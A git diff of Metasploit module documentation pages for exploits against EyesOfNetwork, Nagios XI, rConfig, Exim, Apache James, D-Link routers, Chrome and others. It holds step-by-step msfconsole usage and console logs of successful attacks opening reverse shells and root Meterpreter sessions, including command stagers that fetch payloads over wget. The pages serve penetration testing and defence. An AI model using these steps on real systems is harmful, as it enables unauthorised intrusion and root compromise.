+Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically, it writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap host discovery scan against the target. This approach achieves privilege escalation because the default sudo configuration permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
+
+The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via two methods, i.e. by generating an API access token based on a hardcoded key, and via SQLI. This module has been successfully tested on EyesOfNetwork 5.3 with API version 2.4.2.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/eyesofnetwork_autodiscovery_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set payload [payload]`
+6. Do: `set LHOST [IP]`
+7. Do: `exploit`
+
+## Options
+1. `SERVER_ADDR`. This option should be set in case the EyesOfNetwork server IP address is different from RHOST. This because the EON server IP is needed to generate the API key.
+
+## Scenarios
+```
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
+
+Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT        443              yes       The target port (TCP)
+   SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
+   SSL          true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                yes       Base path to EyesOfNetwork
+   VHOST                         no        HTTP server virtual host
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Using generated API key: a496fb1025187066dc1e4e56197bd2db1a23c565f42b98df8ff55698442b6476
+[+] Authenticated as user kY7Qn1gr8L
+[*] Sending payload (428 bytes) ...
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:45897) at 2020-02-19 15:30:31 +0100
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+## References
+1. <https://www.exploit-db.com/exploits/48025>
+2. <https://nvd.nist.gov/vuln/detail/CVE-2020-8654>
+3. <https://nvd.nist.gov/vuln/detail/CVE-2020-8655>
+4. <https://nvd.nist.gov/vuln/detail/CVE-2020-8656>
+5. <https://nvd.nist.gov/vuln/detail/CVE-2020-8657>
@@ -21,8 +21,6 @@ gcc ./cgitest.c -o cgi-bin/cgitest

 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/goahead_ldpreload```
@@ -10,15 +10,13 @@ This module exploits an unauthenticated command execution vulnerability in Apach

 https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn

-## Vulnerable Application Installation Setup.
+### Vulnerable Application Installation Setup.

 Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d`


 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/hadoop_unauth_exec```
@@ -1,4 +1,5 @@
 ## Vulnerable Application
+
 This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging
 Gateway. An unauthenticated user can execute a terminal command under the context of the web user.

@@ -11,7 +12,7 @@ endpoint without having a valid session.
 Combining these vulnerabilities gives the opportunity execute operation system commands under the
 context of the web user.
        
-## Vulnerable Application Installation Steps
+### Installation Steps

 Complete the following trial submission form. You will be able to [download the product as a OVA or ISO file](https://www.microfocus.com/products/secure-gateway/trial/).
 Installation instructions can be [found here](https://www.microfocus.com/documentation/secure-messaging-gateway/GWAVA%207.0/secure-gateway.pdf).
@@ -111,4 +112,4 @@ msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run
 meterpreter > pwd
 /opt/gwava/gwavaman/http/admin/contents/ou
 meterpreter >
-```
+```
@@ -0,0 +1,96 @@
+## Introduction
+This module exploits a vulnerability in Nagios XI before 5.6.6 in order to execute arbitrary commands as root.
+
+The module first checks if the supplied credentials are valid and belong to a user with permissions to modify plugins. It then exploits these permissions by uploading a malicious plugin to the target and subsequently sending an HTTP GET request to profile.php?cmd=download. This request downloads a system profile from the server and in the process launches the getprofile.sh script as root via a passwordless sudo entry. This script executes the malicious plugin as root.
+
+For all supported targets except `Linux (cmd)`, the module uses a command stager to write the exploit to the target via the malicious plugin. However, this method may not work if Nagios XI is running in a restricted Unix environment like a minimal/custom CentOS installation. In the latter case, the target must be set to `Linux (cmd)`. For this target, the module writes the payload directly to the malicious plugin while avoiding commands that may not be supported in a restricted environment. It is recommended to use the target's default `cmd/unix/reverse_bash` payload in this scenario.
+
+If the target is found to be vulnerable but the module completes without establishing a session, try increasing the value of `WfsDelay` (the additional delay when waiting for a session). The default value of this advanced option is 10 seconds. To check it, run `show advanced`. Other possible solutions are changing the payload, manually setting the value of the `CMDSTAGER::FLAVOR` advanced option, and setting the target to `Linux (cmd)` as explained above.
+
+Valid credentials for a user with administrative privileges are required. This module was successfully tested on Nagios XI 5.6.5 running on CentOS 7. Please note that the module may behave differently when run against older versions of Nagios XI. For instance, during a test against Nagios XI 5.4.10, the module failed to trigger execution of the payload. Instead, the payload was executed randomly after a period of time (up to 5 minutes). Moreover, the session that was ultimately established, was not a root session.
+
+## Vulnerable system
+Nagios XI before 5.6.6.
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/nagiosxi_authenticated_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set SRVHOST [IP]`
+6. Do: `set USERNAME [username]`
+7. Do: `set PASSWORD [password]`
+8. Do: `set payload [payload]`
+9. Do: `set LHOST [IP]`
+10. Do: `set LPORT [port]`
+11. Do: `exploit`
+
+## Options
+1. `USERNAME`. The username to authenticate with. This user should have permissions to modify plugins. The default setting is `nagiosadmin`, which is the default admin account for Nagios XI systems.
+2. `PASSWORD`. The password to authenticate with.
+
+## Targets
+0. Linux (x86)
+1. Linux (x64) # This is the default target.
+2. Linux (cmd) # If wget is not installed on the target, this target should be selected together with the payload cmd/unix/reverse_bash.
+
+## Scenarios
+```
+msf5 exploit(linux/http/nagiosxi_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagiosxi_authenticated_rce):
+
+   Name       Current Setting       Required  Description
+   ----       ---------------       --------  -----------
+   PASSWORD   P@ssw0rd!             yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.1           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80                    yes       The target port (TCP)
+   SRVHOST    192.168.1.2           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080                  yes       The local port to listen on.
+   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                     yes       Base path to NagiosXI
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME   nagiosadmin           yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux (x64)
+
+
+msf5 exploit(linux/http/nagiosxi_authenticated_rce) > run
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Found Nagios XI application with version 5.6.5.
+[*] Using URL: http://192.168.1.2:8080/eFFP5lYvZ8eCnR0
+[*] Uploading malicious 'check_ping' plugin...
+[*] Command Stager progress - 100% done (121/121 bytes)
+[+] Successfully uploaded plugin.
+[*] Executing plugin...
+[*] Waiting for the plugin to request the final payload...
+[*] Client 192.168.1.1 (Wget/1.14 (linux-gnu)) requested /eFFP5lYvZ8eCnR0
+[*] Sending payload to 192.168.1.1 (Wget/1.14 (linux-gnu))
+[*] Sending stage (3021284 bytes) to 192.168.1.1
+[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:56510) at 2020-02-27 16:27:49 +0100
+[*] Deleting malicious 'check_ping' plugin...
+[+] Plugin deleted.
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+
+```
+## References
+1. <https://github.com/jakgibb/nagiosxi-root-rce-exploit>
+2. <https://nvd.nist.gov/vuln/detail/CVE-2019-15949>
@@ -0,0 +1,77 @@
+## Vulnerable Application
+This module exploits multiple vulnerabilities in rConfig version 3.9 and prior in order to execute arbitrary commands.
+
+The module first add a temporary admin user to the application by exploiting an SQL injection (CVE-2020-10220).
+
+Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `path` parameter of the ajaxArchiveFiles functionality within the rConfig web interface (CVE-2019-19509).
+
+The module works with HTTP or HTTPS (both were tested) but the application does redirection via php code so SSL is enabled by default (and should be used). Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQLI. This module has been successfully tested on rConfig 3.9.2 and 3.9.4.
+
+Tips : once you get a shell, look at the CVE-2019-19585. You will probably get root because rConfig install script add Apache user to sudoers with nopasswd ;-)
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. `use exploit/linux/http/rconfig_ajaxarchivefiles_rce`
+4. `set RHOSTS target_ip`
+5. `set RPORT target_port`
+6. `set LHOST your_ip`
+7. `set LPORT your_port`
+8. `set verbose true`
+9. `exploit -j`
+
+## Scenarios
+```
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > show options
+
+Module options (exploit/linux/http/rconfig_ajaxarchivefiles_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path to Rconfig
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set RHOSTS 1.1.1.1
+RHOSTS => 1.1.1.1
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set LHOST 1.1.1.2
+LHOST => 1.1.1.2
+
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > 
+[+] rConfig version 3.9 detected
+[+] New temporary user 6QpO8mLt created
+[+] Authenticated as user 6QpO8mLt
+[*] Command shell session 1 opened (1.1.1.2:4444 -> 1.1.1.1:34586) at 2020-03-10 22:26:46 +0100
+[+] Command sucessfully executed
+[*] User 6QpO8mLt removed successfully !
+
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > sessions -i 1
+[*] Starting interaction with 1...
+id
+uid=48(apache) gid=48(apache) groups=48(apache)
+```
+## References
+1. <https://cvedetails.com/cve/CVE-2019-19509/>
+2. <https://cvedetails.com/cve/CVE-2020-10220/>
+3. <https://www.exploit-db.com/exploits/47982>
+4. <https://www.exploit-db.com/exploits/48208>
+5. <https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py>
+6. <https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py>
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+  [Diamorphine](https://github.com/m0nad/Diamorphine) is a Linux Kernel Module (LKM) rootkit.
+
+  This module uses Diamorphine rootkit's privesc feature using signal
+  64 to elevate the privileges of arbitrary processes to UID 0 (root).
+
+  This module has been tested successfully with Diamorphine from `master`
+  branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/diamorphine_rootkit_signal_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SIGNAL**
+
+  Diamorphine elevate signal. (default: `64`)
+
+
+## Scenarios
+
+### Linux Mint 19 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check
+
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [*] Writing '/tmp/.hwL5UoDL6mfZ' (207 bytes) ...
+  [*] Executing /tmp/.hwL5UoDL6mfZ & echo  ...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.228
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.228:47694) at 2020-02-16 09:28:59 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.228
+  OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter >
+  ```
+
@@ -2,7 +2,7 @@

 Exim 4.87 - 4.91 Local Privilege Escalation

-This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149). 
+This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).

 Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.

@@ -37,10 +37,10 @@ The port that exim is listening to. On most cases it will be port 25 (which is t
 ## ForceExploit

 Force exploit even if the current session is root.
-    
-## SendExpectTimeout

-Timeout per send/expect when communicating with exim.
+## ExpectTimeout
+
+Timeout for Expect when communicating with exim.

 ## WritableDir

@@ -54,9 +54,9 @@ A directory where we can write files (default is /tmp).
 ```
 meterpreter > getuid
 Server username: uid=1000, gid=1000, euid=1000, egid=1000
-meterpreter > 
-Background session 1? [y/N]  
-msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc 
+meterpreter >
+Background session 1? [y/N]
+msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
 session => 1
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
@@ -71,7 +71,7 @@ msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
 [*] The target appears to be vulnerable.
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit

-[*] Started reverse TCP handler on 192.168.0.50:13371 
+[*] Started reverse TCP handler on 192.168.0.50:13371
 [*] Payload sent, wait a few seconds...
 [*] Sending stage (985320 bytes) to 192.168.0.80
 [*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100
@@ -1,12 +1,11 @@
-## Description
+## Vulnerable Application
+
+### Description

  This module attempts to gain root privileges on Juju agent systems running the juju-run agent utility.

  Juju agent systems running agent tools prior to version 1.25.12, 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket to manage software ("units") without setting appropriate permissions, allowing unprivileged local users to execute arbitrary commands as root.

-
-## Vulnerable Application
-
  [Juju](https://juju.ubuntu.com/) is an open source application modeling tool designed for devops to deploy, configure, scale, and operate software on public and private clouds.

  * Homepage: https://juju.ubuntu.com/
@@ -21,7 +20,7 @@
  * Versions 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64


-## Installation
+### Installation

  Two systems are required. The first runs Juju and the second runs the Juju agent tools.

@@ -1,4 +1,6 @@
-## Description
+## Vulnerable Application
+
+### Description

  This module exploits an injection vulnerability in the Network Manager
  VPNC plugin to gain *root* privileges.
@@ -12,16 +14,12 @@

  Network Manager VPNC versions prior to 1.2.6 are vulnerable.

-
-## Vulnerable Application
-
  This module has been tested successfully with VPNC versions:

  * 1.2.4-4 on Debian 9.0.0 (x64); and
  * 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).

-
-## Installation
+### Installation

  The following installation instructions are for Ubuntu 16.04.04.

@@ -88,4 +86,3 @@
  Meterpreter  : x86/linux
  meterpreter > 
  ```
-
@@ -1,33 +1,35 @@
-## Description
+## Vulnerable Application
+
+### Description

 This module exploits an unauthenticated code execution vulnerability in Redis 4.x and 5.x

-## Vulnerable Application
-
 **Vulnerable Application Link**

 - Official Docker Images

 https://hub.docker.com/_/redis/

-## Vulnerable Application Installation Setup.
+### Installation Setup.

 ```
 docker pull redis
 docker run -p 6379:6379 -d --name redis_slave redis
 ```

+## Verification Steps
+
 ## Options

- CUSTOM
+### CUSTOM

-IF `CUSTOM` set to true, this exploit would generate a source code file, and compile it to a redis module file during running, which is more undetectable. 
+IF `CUSTOM` set to true, this exploit would generate a source code file, and compile it to a redis module file during running, which is more undetectable.
 It's only worked on linux system.

-For other scenarios, such as lack of gcc, or others opreate systems, framework could not compile the source for sucessful exploit, it uses the pre-compiled redis module to accomplish this exploit.
+For other scenarios, such as lack of gcc, or others opreate systems, framework could not compile the source for sucessful exploit, it uses the
+pre-compiled redis module to accomplish this exploit.

-
-## Verification Steps
+## Scenarios

 ### set CUSTOM true (available only on linux)

@@ -168,4 +170,4 @@ meterpreter > getuid
 Server username: uid=999, gid=999, euid=999, egid=999
 meterpreter > getpid
 Current pid: 173
-```
+```
@@ -0,0 +1,155 @@
+## Vulnerable Application
+  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2.
+  By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file.
+  Instructions for installing the vulnerable application for testing can be found here:
+  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
+
+## Verification Steps
+  __1.__ Start msfconsole
+
+  __2.__ DO: Load module exploit/linux/smtp/apache_james_exec
+
+  __3.__ DO: Set the remote and local options: rhosts, lhosts, lport
+
+  __4.__ DO: Set the preferred payload
+
+  __5.__ DO: Run the check method to determine vulnerability
+
+  __6.__ DO: Run the exploit
+
+  __7.__ The payload will connect to the listener if the exploit is successful
+
+## Options
+  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
+  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
+  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
+
+  **RHOSTS:**  The IP address of the vulnerable server.
+
+  **RPORT:**  The port number of the SMTP service.
+
+  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.
+
+## Scenarios
+  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction
+  required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the
+  mail objects.
+
+  __1.__ Load the module:
+
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec
+```
+
+  __2.__ Set remote and local options:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 1
+  target => 1
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169
+  rhosts =>  192.168.224.169
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
+```
+
+  __3.__ Set payload:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+```
+
+  __4.__ Check version and run exploit:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
+  
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
+  [*] Sending stage (3021284 bytes) to 192.168.224.169
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
+  [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)
+
+  meterpreter >
+```
+
+  ---------------------------------------------------------------------------------------------
+  **If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that
+  fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the
+  /etc/bash_completion.d directory and the malicious user account.
+
+  __1.__ Load the module:
+
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec
+```
+
+  __2.__ Set remote and local options:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 0
+  target => 0
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
+  rhosts => 192.168.224.164
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
+```
+
+  __3.__ Set payload:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+```
+
+  __4.__ Check version and run exploit:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
+
+  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
+```
+
+  __5.__ Set up and run listener (Can be done before running exploit):
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lport 4444
+  lport => 4444
+  msf5 exploit(multi/handler) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [*] Sending stage (3021284 bytes) to 192.168.224.164
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800
+
+  meterpreter >
+```
+
+## Targets
+```
+  Id  Name 
+  --  ----
+  0   Bash Completion
+  1   Cron
+```
+
+## References
+  1. <https://www.exploit-db.com/exploits/35513>
+  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>
@@ -0,0 +1,46 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits CVE-2019–20215, an unauthenticated remote injection of operating system commands.
+The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID
+or URN headers of a M-SEARCH UPnP request.
+
+Get a [D-Link router/vulnerable firmware](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147),
+or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.
+
+## Verification Steps
+
+1. Set up router/emulated device
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/dlink_dir859_exec_ssdpcgi`
+4. Do: `set RHOSTS <router_ip>`
+5. Do: `set LHOST <local_ip>`
+6. Do: `set TARGET <URN/UUID>`
+7. Do: `run`
+8. You should get a session as `root`.
+
+## Options
+
+**VECTOR**
+
+This option denotes which header will be used in the request (UUID or URN)
+that triggers the vulnerability.
+
+## Scenarios
+
+### D-link DIR-859 Firmware 1.05
+
+```
+msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run 
+[*] Started reverse TCP handler on 192.168.0.2:4444 
+[*] Using URL: http://0.0.0.0:8080/38YWEX2
+[*] Local IP: http://192.168.70.28:8080/38YWEX2
+[*] Target Payload URN
+[*] Client 192.168.0.1 (Wget) requested /38YWEX2
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Command Stager progress - 100.00% done (110/110 bytes)
+[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
+[*] Server stopped.
+meterpreter > 
+```
@@ -0,0 +1,61 @@
+This module exploits an issue in Chrome 73.0.3683.86 (64 bit). The exploit corrupts the length of a float in order to modify the backing store of a typed array. The typed array can then be used to read and write arbitrary memory. 
+The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload.
+
+**The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.**
+
+## Vulnerable Application
+
+The module is compatible with any 64bit Google Chrome (version 72 or 73), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://www.filepuma.com/download/google_chrome_64bit_73.0.3683.86-21785/](https://www.filepuma.com/download/google_chrome_64bit_73.0.3683.86-21785/)
+
+You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet).
+You may also need to disable Windows Defender.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/browser/chrome_array_map```
+2. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Scenarios
+
+### Windows 10 and Google Chrome 73.0.3683.86 with --no-sandbox
+
+Start Google Chrome without a sandbox:
+```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox```
+
+```
+msf5 > use exploit/multi/browser/chrome_array_map
+msf5 exploit(multi/browser/chrome_array_map) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_array_map) > set URIPATH /
+URIPATH => /
+msf5 exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/browser/chrome_array_map) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_array_map) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/browser/chrome_array_map) >
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Using URL: http://192.168.56.1:8080/
+[*] Server started.
+[*] 192.168.56.3     chrome_array_map - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
+[*] Sending stage (206403 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49675) at 2020-02-29 15:07:06 +0800
+
+msf5 exploit(multi/browser/chrome_array_map) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > pwd
+C:\Program Files (x86)\Google\Chrome\Application\73.0.3683.86
+meterpreter >
+```
@@ -0,0 +1,65 @@
+This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory.
+The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory.
+The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
+
+**The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.**
+
+## Vulnerable Application
+
+The module is compatible with any 64bit Google Chrome (version 80), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified for different versions.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/](https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/)
+
+You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet).
+You may also need to disable Windows Defender.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/browser/chrome_jscreate_sideeffect```
+2. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Scenarios
+
+### Windows 10 and Google Chrome 80.0.3987.87 with --no-sandbox
+
+Start Google Chrome without a sandbox:
+
